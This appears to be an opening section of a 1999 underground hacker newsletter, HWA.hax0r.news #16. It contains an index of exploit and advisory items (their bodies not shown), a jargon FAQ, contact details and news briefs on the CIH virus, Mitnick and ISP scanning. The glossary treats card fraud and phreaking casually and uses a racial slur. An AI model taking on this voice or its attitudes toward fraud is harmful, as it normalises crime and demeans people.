[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 16 Volume 1 1999 May 1st 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #16 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #16 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Telecardnews site, phone card and smartcard cracking............. 04.0 .. Coldfusion mole.cfm.............................................. 05.0 .. More info on the CIH virus....................................... 06.0 .. E-Commerce is still taking it in the gnards...................... 06.1 .. E-commerce boom fueling Security Holes?......................... 07.0 .. Anonymity guaranteed (PCworld)................................... 07.1 .. Anonymity guaranteed (Zero Knowledge Systems).................... 07.2 .. The ZKS white paper.............................................. 08.0 .. Mitnick's accomplice Lewis DePayne, pleads guilty................ 09.0 .. Biometric databases?.Not according to this report... ............ 10.0 .. In the wake of CIH .............................................. 10.1 .. CIH 1.2 Virus Hits Few .......................................... 11.0 .. Lockdown2000 review by BHZ ...................................... 12.0 .. ICQ99 Vulnerabilities and exploits............................... 12.1 .. ICQ Homepage Exploit............................................. 13.0 .. Possible DoS in WinNT RAS (PPTP)................................. 14.0 .. MFT problem could cause you to reformat drive (NTFS)............. 15.0 .. FireWalking a paper on determining Gateway Access Control Lists.. 16.0 .. IGMP+8 fragmentation attack for Linux ........................... 17.0 .. local XFree 3.3.3 symlink root compromise..(freeBSD+others)...... 18.0 .. Microsoft Outlook Express internet zone vulnerability............ 19.0 .. Big Brother 1.09b/c security notice.............................. 20.0 .. "Cyborg Seeks Community" by Steve Mann, wearable cpus anyone?.... 20.1 .. :School For Cyborgs: By Steve Ditlea (sidebar to above article).. 21.0 .. Anonymizing UNIX systems white paper by van Hauser/THC........... 22.0 .. Ffingerd vulnerability........................................... 23.0 .. DoS in IRC services.............................................. 24.0 .. New Java bug creates DoS for Win9x............................... 25.0 .. QPOP 2.4b2 _demo_ REMOTE exploit for FreeBSD 2.2.5.and BSDi 2.1 26.0 .. BSDI IMAP2BIS remote root exploit................................ 27.0 .. Infod AIX exploit................................................ 28.0 .. Cold fusion exploit scanner...................................... 29.0 .. Updated CGI scanner scans for vulnerable servers scans 43 probs.. 30.0 .. MS Outlook has potential reply-to spoofing vulnerability......... 31.0 .. Bash parsing vulnerability....................................... 32.0 .. NetBSD Security Advisory 1999-009................................ 33.0 .. Explorer favicon.ico bug introduces new vulnerabilty............. 34.0 .. Cert: The Good Guys? (old boys network, reads like an ad for CERT) 35.0 .. NASA finds scapegoat? - Programmer indicted...................... 36.0 .. CIH author found?................................................ 37.0 .. INTEL goes after Zero Knowledge Systems.......................... 38.0 .. NT-Exceed DoS.................................................... 39.0 .. NT4 Trojaned Profiles............................................ 40.0 .. Microsoft's web site virus haven! ............................... 41.0 .. New viruses from http://www.wopr.com............................. 42.0 .. Caldera COAS leaves shadow password file readable................ 43.0 .. NT4+SP4 filename length vulnerabilty............................. 44.0 .. CSMMail Windows SMTP Server Remote Buffer Overflow Exploit....... 45.0 .. HP Sendmail 8.8.6 DoS............................................ 46.0 .. KKI inactive connections advisory................................ 47.0 .. How to achieve the status JP has with AntiOnline (from PacketStorm) 48.0 .. Windows thread overrun from a Java Applet........................ 49.0 .. Phone Rangers break into GTE..................................... 50.0 .. Police question CIH virus creator................................ 51.0 .. [ISN] The Virus Vault............................................ 52.0 .. [ISN] The Bad Guys are Crackers.................................. 53.0 .. [ISN] Email threats could bring down a 10yr jail term............ 54.0 .. [ISN] Singapore ISP scans customer computers for vulnerabilities. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... HOW.TO .. "How to hack" by our illustrious editor......................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ News site+........................http://securityhole.8m.com/ News site+........................http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://net-security.org Net Security Link ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman and the #innerpulse, #hns crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Free Keving demonstrations From Project Gamma http://www.projectgamma.com/ April 30, 1999, 16:49 Author: WHiTe VaMPiRe Demonstrations are being planned for Friday, June 4 in front of courthouses nationwide beginning at 2 PM to protest the unjust imprisonment of Kevin Mitnick. Kevin Mitnick has been held in a pre-trial facility since February 15, 1995, four years, without even a bail hearing. What did he do? Murder, rape? No. He has been imprisoned for four years without even a bail hearing for possession of software allegedly worth millions of dollars. However, the companies asserting this have never proven these claims nor have they reported these "losses" to their stockholders, as is required by law. Computer and legal experts agree that it is unlikely that any real damage occurred. The high numbers assume that every file and its associated research were wiped from existence. In truth, no such damage was ever reported. Yet, Kevin Mitnick remains imprisoned as if this actually happened. Related links: Free Kevin Demonstration http://www.kevinmitnick.com/demo/index.html Mitnick documents exposed (included in previous issues) http://www.projectgamma.com/news/archive/1999/april/042499-1416.html ++ Possible Linuxconf Vulnerability (local console) Approved-By: aleph1@UNDERGROUND.ORG Date: Thu, 29 Apr 1999 18:45:40 -0400 Reply-To: The Nefarious Type Sender: Bugtraq List From: The Nefarious Type Subject: Possible Linuxconf Vulnerability To: BUGTRAQ@netspace.org An older version of linuxconf was packaged with Redhat 5.1 and I had not run into any problems with that version. But after installing the latest version (linuxconf-1.13r15-1) onto OpenLinux 1.3, I came upon a problem during boot. It had not detected /sbin/clock, so a menu appeared during boot and asked if I wanted to change this. This happened all before I was even prompted for a login. The fact that someone who has physical access to the server can access linuxconf (which by default, can only be used under root) is kind of disturbing. So far, I have not been able to exploit this problem, though I'm guessing that it could be done (e.g. from that menu, access user configuration, etc.). Linuxconf Homepage http://www.solucorp.qc.ca/linuxconf/ -PrestoChango ++ Computer Student Wrote Chernobyl Virus to Humiliate Antivirus Providers Contributed by Spikeman Chen Ing-hau, a 24-year-old computer student, has been arrested in Taiwan for creating the Chernobyl computer virus. Police said that Chen may not be charged with a crime. If he did not intend to spread the virus, he could avoid criminal charges, but if charged and convicted, Chen faces up to three years in prison under Taiwanese law. The question of civil liability still looms large for Chen, whose virus damaged 600,000 personal computers worldwide when it was triggered on April 26. (The Boston Globe -- http://www.boston.com/dailynews2/120/economy/Computer_student_wrote_Chernob:.shtml) ++ NO COMMENT From HNS http://www.net-security.org/ by BHZ, Friday 30th Apr 1999 on 3:36 pm CET 24.04.1999 Croatian Internet users were striking against HiNet, well known Croatian monopolistic ISP. On that day all strike supporters didn't connect to the Internet. HiNet didn't give any information or statistics about success or failing of our strike. Yesterday some good (but not so good) news came. They will charge our telephone impulses on local base (3 times cheaper then the "old" 077 number calls). OK, we were happy that we have succeeded in one step of our plans, but chilling shocker struck us. From 1st May prices of all telephone impulses will grow 30%. What could we say about it? We will continue our protests in order to bring quality and price of Croatian Internet connection to some western standards. ++ Summercon 99 (From HNN) Contributed by Weld Pond It is that time again. Presented by r00t and Phrack Magazine Summercon99 will be held at the Omni Hotel, part of the CNN Center in downtown Atlanta. Admission is FREE (Feds and Press must pay) and everyone is invited! HNN Cons Page http://www.hackernews.com/cons/cons.html ++ On Packetstorm; "The New Hacker's Dictionary v4.1.2" - The Jargon File is the definitive lexicon of Internet and hacker slang, history, folklore, tradition, and humor. This is the latest version (4.1.2), released on 4/28/99. Almost 10 MB of hacker jargon! By Eric Raymond. http://www.Genocide2600.com/~tattooman/hacking-textfiles/jargon-4.1.2/ (Various formats) ++ Online banking system crashed From www.403-security.org http://www.403-security.org/Htmls/news.htm By Astral 29.04.1999 12:13 Computer glitch is preventing lot of users to use CheckFree Holdings Corp. online bill payment systems using programs such as MS.Money for accessing their accounts.Check Free spokesman sad that it isn't known when system is going to be fixed and ready for using. For now about 350 banks cannot use online paying services .Reason of this glitch ins't known yet, system could be hacked or just some technical problems. Sorry no links for this story ++ Ministry Launches Cyber Attack? From HNN http://www,hackernews.com/ April29th contributed by sunny The Ministry of Home Affairs in Singapore is being accused of breaking into the personal computer of a National University of Singapore law student. Ms Anne Lee, 21, is claiming that her SingNet account was broken into on 10 occasions in four days about two weeks ago. According to a protection program called Jammer, which was installed on the machine the IP address of the attack belonged to the Ministry of Home Affairs. The National Computer Board's assistant director of IT security, Mr Goh Seow Hiong, said "It is very difficult to change the IP address unless the person has very sophisticated skills." (Bwahahahahahaha) The Straits Times http://straitstimes.asia1.com.sg/sin/sin2_0429.html Forwarded From: William Knowles ++ Ministry does scan machines from HNN http://www.hackernews.com April 30th contributed by Sunny SingNet and SingTel Magix, two ISPs located in Singapore, have admitted to asking the Home Affairs Ministry's IT security unit to scan 200,000 of its subscribers to see if their systems are vulnerable to hacker attacks. The ISPs asked the Ministry to perform the scans because they where the "experts" in this area. Users where not informed of the scans beforehand. This new report of scans is evidently the cause of yesterdays report that Ms Lee, 21, was being "attacked" by the Ministry of Home Affairs. (Sure wish I lived somewhere where everyone looked after my well being so closely) Straits Times http://straitstimes.asia1.com.sg/one1/one1.html Nando Times http://www.techserver.com/story/body/0,1634,43806-70661-511093-0,00.html ++ India Stomping Out Piracy From HNN http://www,hackernews.com/ April 29th contributed by Dumbo Officials in India want to stomp out piracy. They felt that the best way to do this was put their foot down and the bigger the foot the better. So they got an elephant to stomp on confiscated pirated CDs in New Delhi's Nehru Place. http://www.news.com/News/Item/0,4,0-35780,00.html?st.ne.ni.lh ++ MS Sues FLA Companies From HNN http://www,hackernews.com/ April 29th contributed by Code Kid Microsoft is suing 15 Florida companies alleging that they sold or installed illegal copies of the companies software. Microsoft isn't able to estimate how much software piracy costs the company but it is able to estimate what it costs the state of Florida. Microsoft claims that Florida lost 7,186 jobs in 1997 and $490 million in lost wages, tax revenue and retail sales. Yet, it has no idea what piracy costs Microsoft. http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html http://www.zdnet.com/zdnn/stories/news/0,4586,2249422,00.html ++ Antidote Vol. 2 #1 released From HNN http://www.hackernews.com/ contributed to HNN by Lord Oak The newest release of Antidote is now available. With articles on Anonymous Surfing, ICQ99a Security Glitches, Intruder Alert '99, the eBayla Bug and a whole lot more. Antidote; http://www.thepoison.org/antidote/issues/vol2/1.txt ++ Hackers Defended From HNN http://www.hackernews.com/ contributed to HNN by erewhon Mainstream media is actually publishing a positive and accurate story about hackers. Better read it quick before they pull it and come to their senses. ABC News http://abcnews.go.com/sections/tech/Geek/geek41.html ++ This has been up in the air for the last couple months or so, looks like the ASIO (Australian Security Agency) is still pushing for the right to be able to break into personal computers if such systems are thought to contain data that is detrimental to the countries security...who watches the watchers? From HNN http://www.hackernews.com/ ASIO wants Permission to Break into Home Computers. contributed by Anonymous The Australian Security and Intelligence Organization wants a widening of its powers so that its agents may 'hack' into personal home computers. These new powers will include the ability to manipulate data so that their entry may not be detected as well as breaking encryption around data that they want to see. The Age; http://www.theage.com.au/daily/990428/news/news8.html ++ Keen Veracity 7 was released Apr 22nd I missed this last issue ----------------------------------------------------------------------------- K E E N V E R A C I T Y L E G I O N S O F T H E U N D E R G R O U N D I S S U E # [7] ----------------------------------------------------------------------------- --[CONTENTS]-- (1/8)--[Introduction]---------------------------------------[Digital Ebola] (2/8)--[Redir games with ARP and ICMP]-------------------------------[yuri] (3/8)--[FUN WITH THE ES-3810 AN ATM REALITY]--------------------[optiklenz] (4/8)--[Ip Aliasing]-----------------------------------------------[guidob] (5/8)--[Yet Another Newbies Guide to Linux Security]--------[Digital Ebola] (6/8)--[UBE98 -- Unbreakable Encryption]----------------------[Joe Peschel] (7/8)--[Windows 95 Protection]-------------------------------------[NtWak0] ++ b4b0 releases issue #7 also April 26th...full of goodness, get it today (00). Greets, Hellos, Staff, What not. (01). Introduction - by ph1x *y0r elite edit0r* (heed my advice) (02). Hacking Shiva-Lan-Rover-Servers - [Hybrid] (03). How to have an out of body experience - [ph1x] (04). Womper language interpretor - [chrak] (06). Buffer overflow exploitation - [ph1x] 